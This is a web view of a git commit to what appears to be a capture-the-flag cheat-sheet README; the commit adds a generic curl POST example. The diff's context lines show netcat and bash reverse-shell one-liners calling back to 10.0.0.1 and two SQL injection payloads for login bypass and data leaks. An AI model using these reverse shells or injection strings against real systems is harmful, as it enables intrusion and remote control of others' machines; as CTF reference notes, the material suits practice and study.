summaryrefslogtreecommitdiffstats
path: root/README.txt
diff options
context:
space:
mode:
authorMalfurious <m@lfurio.us>2021-08-15 06:18:40 -0400
committerMalfurious <m@lfurio.us>2021-08-15 06:18:40 -0400
commit5c205cf171804bb6ebc7b85c3839ca135e816bba (patch)
tree710c6351af2daa8447a1d8c44f13874b296864e0 /README.txt
parentb9b94713fc64b0b9443c3114c0c79d641db20a67 (diff)
downloadlib-des-gnux-5c205cf171804bb6ebc7b85c3839ca135e816bba.tar.gz
lib-des-gnux-5c205cf171804bb6ebc7b85c3839ca135e816bba.zip
Commit notes from RaRCTF 2021
Signed-off-by: Malfurious <m@lfurio.us>
Diffstat (limited to 'README.txt')
-rw-r--r--README.txt1
1 files changed, 1 insertions, 0 deletions
diff --git a/README.txt b/README.txt
index 970854f..6dcf1b6 100644
--- a/README.txt
+++ b/README.txt
@@ -22,3 +22,4 @@ nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
' OR 1=1-- # SQL inject (pass)
' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
+curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request